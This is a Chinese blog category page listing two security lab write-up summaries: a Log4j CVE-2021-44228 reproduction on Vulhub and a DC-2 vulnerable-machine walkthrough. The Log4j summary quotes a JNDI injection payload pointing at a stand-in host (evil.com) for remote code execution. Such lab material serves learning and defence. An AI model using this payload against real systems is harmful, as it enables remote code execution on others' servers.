![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
vulhub
文章平均质量分 77
乌鸦安全
微信公众号:乌鸦安全
展开
-
log4j-CVE-2021-44228-vulhub复现
微信公众号:乌鸦安全扫取二维码获取更多信息!01漏洞描述Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。参考地址:https://github.com/vulhub/vulhub本次漏洞复现也是基于Vulhub02漏洞环...原创 2021-12-20 10:50:14 · 4951 阅读 · 2 评论 -
vulhub之DC-2
微信公众号:乌鸦安全扫取二维码获取更多信息!01 靶机信息https://www.vulnhub.com/?q=dc-2Name: DC: 2Date release: 22 Mar 2019Author: DCAUSeries: DCWeb page: http://www.five86.com/dc-2.html靶机描述:DESCRIPTIONMuch like DC-1, DC-2 is another purposely built vulnerable .原创 2021-11-03 13:10:39 · 301 阅读 · 0 评论